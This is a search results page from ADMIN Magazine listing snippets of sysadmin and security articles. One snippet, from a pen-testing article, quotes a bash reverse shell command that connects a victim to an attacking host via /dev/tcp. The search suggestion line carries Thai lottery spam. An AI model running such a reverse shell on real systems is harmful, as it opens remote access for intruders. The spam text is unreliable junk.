Admin Magazine
 
  • News
  •  
  • Articles
  •  
  • Tech Tools
  •  
  • Subscribe
  •  
  • Archive
  •  
  • Whitepapers
  •  
  • Digisub
  •  
  • Write for Us!
  •  
  • Newsletter
  •  
  • Shop
  • DevOps
  • Cloud Computing
  • Virtualization
  • HPC
  • Linux
  • Windows
  • Security
  • Monitoring
  • Databases
  • all Topics...
Search
Login
ADMIN Magazine on Facebook
GooglePlus

Search

Spell check suggestion: brian calling -(liทe@248fvcen)-สูตรหวยออนไลน์.wco ?

Refine your search
Sort order
  • Date
  • Score
Content type
  • Article (Print) (490)
  • Article (106)
  • News (71)
  • Blog post (3)
Keywords
Creation time
  • Last day
  • Last week
  • Last month
  • Last three months
  • Last year

« Previous 1 ... 40 41 42 43 44 45 46 47 48 49 50 51 52 53 ... 67 Next »

14%
TCP Stealth hides open ports
10.04.2015
Home »  Archive  »  2015  »  Issue 26: OpenS...  » 
Lead Image © momo5287, 123RF.com
, in particular, you have no way of knowing whether the problem is caused by the application or the underlying kernel. It is definitely worthwhile to look at the sample programs for your first experiments
14%
Monitor your network infrastructure with SNMP
10.04.2015
Home »  Archive  »  2015  »  Issue 26: OpenS...  » 
Lead Image © lightwise, 123RF.com
SNMP traps, which cause the device to push a message to a manager when specific events occur. The message typically reaches the manager on port 162. SNMP reads values from various network components
14%
Keeping the software in Docker containers up to date
16.08.2018
Home »  Archive  »  2018  »  Issue 46: CMS S...  » 
Lead Image © Michal Bednarek, 123RF.com
workflow for handling containers in a meaningful way. Imagine, for example, that dozens of containers in a distributed setup are exposed to the public with a vulnerability like the SSL disaster Debian caused
14%
Exploring Kubernetes with Minikube
11.09.2018
Home »  Archive  »  2018  »  Issue 47: Findi...  » 
] might change between network restarts, causing loss of connectivity to your cluster.'' For Debian-based package system, the command for installing KVM is: $ apt install libvirt-bin qemu-kvm Add
14%
Kali Linux is the complete toolbox for penetration testing
04.10.2018
Home »  Archive  »  2018  »  Issue 47: Findi...  » 
Lead Image © Tatiana Venkova, 123RF.com
indicate that the following address belongs to the access point. This command causes all legitimate client connections to be interrupted and re-established. You need to record these actions with Wireshark
14%
Quick and easy SaaS provisioning for OpenLDAP
04.10.2018
Home »  Archive  »  2018  »  Issue 47: Findi...  » 
Lead Image © scyther5, 123RF.com
and removing users in an LDAP group such as this will automatically cause the users' accounts in the corresponding SaaS app, as mapped in your Okta configuration, to be added or removed. You could also
14%
Improved defense through pen testing
13.12.2018
Home »  Archive  »  2018  »  Issue 48: Secur...  » 
Lead Image Photo by Simeon Jacobson on Unsplash
with Computer A (the victim system) receiving the following code: $ bash -I <& /dev/tcp/10.0.0.1/444 0<&1 that causes Computer A to connect to Computer B (the attacking system that receives the connection from
14%
A versatile proxy for microservice architectures
29.09.2020
Home »  Archive  »  2020  »  Issue 59: Custo...  » 
Lead Image © Russell Shively, 123RF.com
during the analysis of incoming HTTP packets, Envoy could detect that a defined limit for individual back ends has been exceeded, which would cause Envoy to route them dynamically elsewhere. As an example
14%
Layer 3 SDN
29.09.2020
Home »  Archive  »  2020  »  Issue 59: Custo...  » 
Lead Image © Kirsty Pargeter, 123RF.com
finds its way from virtual machine (VM) A on host 1 to VM B on host 2, but it is precisely this encapsulation that regularly causes trouble in the context of SDN. In theory, encapsulation should not have
14%
VMware vRealize management suite for hybrid clouds
30.11.2020
Home »  Archive  »  2020  »  Issue 60: Secur...  » 
Lead Image © ucadp, 123RF.com
causes what kind of costs. The prerequisite, however, is that someone enters the costs incurred for parameters such as vCPUs and vRAM in the tool for their own use case. Depending on the contract

« Previous 1 ... 40 41 42 43 44 45 46 47 48 49 50 51 52 53 ... 67 Next »

Service

  • Article Code
  • Contact
  • Legal Notice
  • Privacy Policy
  • Glossary
    • Backup Test
© 2025 Linux New Media USA, LLC – Legal Notice